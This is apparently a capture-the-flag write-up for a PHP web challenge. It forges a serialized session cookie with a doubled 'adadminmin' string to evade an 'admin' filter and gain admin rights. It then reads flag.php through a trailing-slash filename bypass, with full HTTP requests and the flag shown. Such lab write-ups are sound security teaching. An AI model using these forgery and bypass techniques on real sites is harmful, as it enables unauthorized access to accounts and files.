Web
ez_php
The challenge gives us an address to visit.
Opening the challenge address, we find a login page:

I capture the request with Burp:

The GET request carries a cookie (the value is sent in the Cookie header, not as a query parameter):

```
TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6Imd1ZXN0Ijt9
```
Base64-decoding it gives a PHP serialized object (NUL bytes shown as \0; the \0Session\User\0 prefix means username is a private property of Session\User, and every s:N counts raw bytes including those NULs):

```
O:12:"Session\User":1:{s:22:"\0Session\User\0username";s:5:"guest";}
```

The cookie currently carries guest privileges, so we can try forging the serialized object to give ourselves admin. Changing guest to admin and resending does not work: the declared string length no longer matches the content, which suggests the server detects the substring admin and strips it from the cookie before unserializing (leaving s:5:"" behind, which unserialize() rejects). The next idea is to bury admin inside a longer string; experimenting shows that both the doubled form and isAdmin can be used as substitutes.
So we try the double-write bypass, sending adadminmin (after one admin is removed, the remaining bytes still spell admin and the declared length 5 is correct):

```http
Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
```

Response:

```http
HTTP/1.1 302 Found
Server: nginx/1.22.1
Date: Sat, 13 Dec 2025 04:55:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Location: dashboard.php
Content-Length: 0
```
We get Location: dashboard.php, meaning we now have admin privileges.
Next, visit dashboard.php with the forged cookie:

```http
GET /dashboard.php HTTP/1.1
Host: 192.168.18.22:25005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.18.22:25005/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
Connection: close
```

The page looks like it reads a file for us, so we scan with dirsearch to see what is there:

flag.php shows up. Try reading it directly: dashboard.php?filename=flag.php
That is refused, but appending a trailing slash, dashboard.php?filename=flag.php/, gets through. (The source of dashboard.php is not shown, so exactly which filename check the trailing slash defeats is not established here; what we know is that the plain name is blocked and the slash variant is read.)
Full request:

```http
GET /dashboard.php?filename=flag.php/ HTTP/1.1
Host: 192.168.18.22:25005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.18.22:25005/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: identification=TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=
Connection: close
```
This returns the flag:

It sits in the page source under the noticeboard section; copy it out and submit.

flag='flag{8fee436d-176e-4b69-80ce-3b2ed0eee331}'